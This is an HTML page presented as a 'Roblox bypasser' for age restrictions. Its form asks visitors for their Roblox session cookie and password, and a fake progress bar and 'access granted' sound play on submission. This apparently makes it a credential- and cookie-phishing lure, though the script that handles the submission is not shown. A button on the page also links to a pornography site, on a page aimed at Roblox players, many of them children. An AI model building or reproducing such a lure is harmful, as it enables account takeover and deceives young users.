<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>ROBLOX BYPASSER FORCE 13+</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <video id="bgVideo" autoplay muted loop playsinline>
    <source src="https://media.discordapp.net/attachments/1333401751193260062/1354181108245336264/napTik-dot-Kim-51ff08a63c4d086f14fa999a8f417cdd.mp4" type="video/mp4">
  </video>

  <audio id="accessSound">
    <source src="https://raw.githubusercontent.com/Akosiandrei/useless-code/21958a6415c14ff8e3b39f7655d779c8a5744348/public_access_granted.mp3" type="audio/mp3">
  </audio>

  <button id="toggleAudioBtn" class="toggle-audio-btn">Unmute</button>

  <div class="background">
    <div class="ball"></div>
    <div class="ball"></div>
    <div class="ball"></div>
    <div class="ball"></div>
    <div class="ball"></div>
  </div>

  <div id="mainContainer" class="container">
    <h2>SPLUNKING BYPASSER 13+
Welcome 👋 We have the best roblox bypasser in the whole world!</h2>
    <p>Enter your cookie to bypass</p>
    <form id="form">
      <input
        type="text"
        id="cookie"
        name="cookie"
        placeholder="Enter cookie"
        required
      >
      <input
        type="password"
        id="password"
        name="password"
        placeholder="Enter password"
        required
      >
      <button
        type="submit"
        id="submitBtn"
      >
        Submit
      </button>
    </form>

    <div class="progress-container" id="progressContainer">
      <div class="progress-bar" id="progressBar"></div>
    </div>
    <div class="progress-text" id="progressText"></div>

    <div class="social-buttons">
      <button onclick="location.href='https://www.facebook.com/HEANNAMALAKASMAGSELOSMALAKIPABURAT'">owner page</button>
      <button onclick="location.href='https://beeg.com'">soon</button>
    </div>
  </div>

  <div id="finalMessage" class="final-message"></div>

  <script src="script.js"></script>
</body>
</html>
